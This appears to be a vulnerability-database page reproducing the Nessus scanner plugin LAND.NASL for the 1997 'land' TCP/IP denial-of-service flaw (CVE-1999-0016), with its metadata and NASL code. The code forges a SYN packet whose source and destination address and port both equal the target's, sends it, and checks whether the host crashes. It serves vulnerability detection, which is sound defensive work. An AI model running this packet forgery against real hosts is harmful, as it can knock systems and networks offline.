TCP/IP SYN Loopback Request Remote DoS (land.c)

1999-06-2200:00:00

www.tenable.com

122

0.001 Low

EPSS

Percentile

51.1%

JSON

It was possible to make the remote server crash using the ‘land’ attack.

An attacker may use this flaw to shut down this server, thus preventing your network from working properly.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10133);
 script_version("1.33");
 script_cvs_date("Date: 2018/11/15 20:50:21");

 script_cve_id("CVE-1999-0016");
 script_bugtraq_id(2666);

 script_name(english:"TCP/IP SYN Loopback Request Remote DoS (land.c)");
 script_summary(english:"Crashes the remote host using the 'land' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is affected by a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to make the remote server crash using the 'land'
attack.

An attacker may use this flaw to shut down this server, thus
preventing your network from working properly.");
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e5a70096");
 script_set_attribute(attribute:"solution", value:"Contact your operating system vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"1997/12/17");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);

 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
addr = get_host_ip();
ip = forge_ip_packet(   ip_v : 4,
			ip_hl : 5,
			ip_tos : 0,
			ip_len : 20,
		        ip_id : 0xF1C,
			ip_p : IPPROTO_TCP,
			ip_ttl : 255,
		        ip_off : 0,
			ip_src : addr);
port = get_host_open_port();
if(!port)exit(0);

# According to
#  From: "Seeker of Truth" <[email protected]>
#  To: [email protected]
#  Subject: Fore/Marconi ATM Switch 'land' vulnerability
#  Date: Fri, 14 Jun 2002 23:35:41 +0000
#  Message-ID: <[email protected]>
# Fore/Marconi ATM Switch FT6.1.1 and FT7.0.1 are vulnerable to a land
# attack against port 23.

tcpip = forge_tcp_packet(    ip	      : ip,
			     th_sport : port,
			     th_dport : port,
			     th_flags : TH_SYN,
		             th_seq   : 0xF1C,
			     th_ack   : 0,
			     th_x2    : 0,
		 	     th_off   : 5,
			     th_win   : 2048,
			     th_urp   : 0);

#
# Ready to go...
#

start_denial();
send_packet(tcpip, pcap_active:FALSE);
sleep(5);
alive = end_denial();
if(!alive){
		set_kb_item(name:"Host/dead", value:TRUE);
		security_warning(0);
		}

References

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0016

www.nessus.org/u?e5a70096

0.001 Low

EPSS

Percentile

51.1%

JSON

Related for LAND.NASL